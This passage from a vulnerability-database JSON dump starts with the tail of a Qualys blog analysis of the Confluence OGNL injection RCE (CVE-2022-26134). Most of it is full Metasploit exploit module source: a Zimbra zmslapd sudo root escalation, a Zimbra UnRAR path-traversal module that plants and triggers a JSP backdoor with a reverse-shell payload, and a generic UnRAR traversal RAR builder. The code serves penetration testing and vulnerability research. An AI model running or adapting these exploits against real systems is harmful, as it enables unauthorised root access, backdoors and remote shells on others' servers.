com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\nAnalyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. The execution flows up to ` com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)` where [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls` [translateVariables](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>)` method from [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class ` com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)` which appears to be sink where the OGNL expression evaluation takes place invoking [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method from `OgnlValueStack` class `com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)` and goes forward parsing the OGNL expression with `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and multiple other classes.\n\n### Source Code Analysis\n\nTo have a better understanding of the execution flow of this RCE vulnerability, it's important that we dive into the source code of these classes:\n\nStarting off with [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\nThe `getNamespaceFromServletPath` is used to obtain the namespace to which an Action belongs.\n\nFor example : When a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line ` servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` will consider everything before the last trailing slash as a namespace. Hence namespace `<RCE payload>` is created from the malicious requested URI.\n\nAs a result, the last trailing slash is an essential component for the exploit to work, if omitted the payload won\u2019t work.\n\nThis namespace is further utilized by `execute` method using `this.namespace` expression inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\nHere, `translateVariables` method from `TextParseUtil` class is called on `this.namespace` expression which converts all instances of `${...}` in expression to the value returned by a call to `OgnlValueStack.findValue`.\n\nGoing forward with [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) ? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n[`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method here takes two parameters `expression` which is basically a string which hasn\u2019t been translated and secondly a `value stack` which allows dynamic OGNL expressions to be evaluated against it.\n\nInside `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");` class `Pattern` defines a pattern to be searched and then it\u2019s created using `Pattern.compile()` method.\n\nIn Java `\\` single backslash is an escape character for strings. Hence `\\\\` double backslash are used in above regex `\\\\$\\\\{([^}]*)\\\\}` to escape $, {, } characters.\n\nNext line `final Matcher m = p.matcher(expression);` uses matcher() method to search for the pattern in a string, for example : `${qualys.rce.payload}` pattern is created. \n\nFurther contents of round brackets are extracts from the regular expression `\\\\$\\\\{([^}]*)\\\\}` to match the expression using `final String g = m.group(1);` and pass it to `final Object o = stack.findValue(g);`\n\nAnd finally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker makes a malicious request URI `http://127.0.0.1:8090/${rce_payload}/`, first `${rce_payload}` gets translated into a namespace and then using` TextParseUtil.translateVariables` the payload is extracted and henceforth using `findValue` the OGNL expression `rce_payload` gets evaluated causing Remote Code Execution.\n\n## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n![](https://blog.qualys.com/wp-content/uploads/2022/06/kb-1070x544.jpeg)\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users shall see the following results in the vulnerability scan report:\n\n![](https://blog.qualys.com/wp-content/uploads/2022/06/report-1070x570.jpeg)\n\n## Solution\n\nDue to the Critical severity and active exploitation of this vulnerability, organizations using the Confluence application are strongly advised to upgrade their Confluence application to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later version to remediate CVE-2022-26134 vulnerability. More information regarding patching and workaround can be referred to [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n## Credits\n\nConfluence Security Advisory**:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to** **[Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)**.**\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-03T15:23:51", "description": "This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T18:55:05", "type": "metasploit", "title": "Zimbra zmslapd arbitrary module load", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2023-03-27T15:46:07", "id": "MSF:EXPLOIT-LINUX-LOCAL-ZIMBRA_SLAPPER_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/zimbra_slapper_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://web.archive.org/web/20221002011602/https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/zimbra_slapper_priv_esc.rb", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-27T19:45:47", "type": "metasploit", "title": "UnRAR Path Traversal in Zimbra (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-12-06T14:07:28", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Sanity check - the file shouldn't exist, but we should be able to do requests to the server\n if datastore['TRIGGER_PAYLOAD']\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::Unknown, 'Could not determine the public web path')\n end\n\n print_status('Checking the HTTP connection to the target')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')\n end\n\n # Break when the file successfully appears\n unless res.code == 404\n fail_with(Failure::Unknown, \"Server returned an unexpected result when we attempted to trigger our payload (expected HTTP/404, got HTTP/#{res.code}\")\n end\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n\n print_good('File created! Email the file above to any user on the target Zimbra server')\n\n # Bail if they don't want the payload triggered\n return unless datastore['TRIGGER_PAYLOAD']\n\n register_file_for_cleanup(target_filename)\n\n interval = datastore['CheckInterval'].to_i\n print_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\")\n\n # This loop is mostly from `multi/handler`\n stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i\n timeout = datastore['ListenerTimeout'].to_i\n\n # We flip this once we trigger the payload\n keep_sending = true\n loop do\n break if session_created?\n break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)\n\n # Once we've triggered the payload, stop trying to\n if keep_sending\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')\n end\n\n # Break when the file successfully appears\n if res.code == 200\n print_good('Successfully triggered the payload')\n keep_sending = false\n next\n end\n end\n\n Rex::ThreadSafe.sleep(interval)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 (open source version 6.1.7). The core issue is that when a symbolic link is unRAR'ed, Windows symbolic links are not properly validated on Linux systems and can therefore write a symbolic link that points anywhere on the filesystem. If a second file in the archive has the same name, it will be written to the symbolic link path.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T21:05:15", "type": "metasploit", "title": "UnRAR Path Traversal (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-22T18:46:50", "id": "MSF:EXPLOIT-LINUX-FILEFORMAT-UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/fileformat/unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that exploits CVE-2022-30333, which is a\n path-traversal vulnerability in unRAR that can extract an arbitrary file\n to an arbitrary location on a Linux system. UnRAR fixed this\n vulnerability in version 6.12 (open source version 6.1.7).\n\n The core issue is that when a symbolic link is unRAR'ed, Windows\n symbolic links are not properly validated on Linux systems and can\n therefore write a symbolic link that points anywhere on the filesystem.\n If a second file in the archive has the same name, it will be written\n to the symbolic link path.\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Generic RAR file', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),\n OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\" - as well as a filename).']),\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)'])\n ]\n )\n end\n\n def exploit\n print_status(\"Target filename: #{datastore['TARGET_PATH']}\")\n\n if datastore['CUSTOM_PAYLOAD'].present?\n print_status(\"Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}\")\n payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])\n\n # Append a newline + NUL byte, since random data will be appended and we\n # don't want to break shellscripts\n payload_data.concat(\"\\n\\0\")\n else\n print_status('Encoding configured payload')\n payload_data = generate_payload_exe\n end\n\n begin\n rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload_data)\n rescue StandardError => e\n fail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\")\n end\n\n file_create(rar)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-11-03T06:44:19", "description": "Various 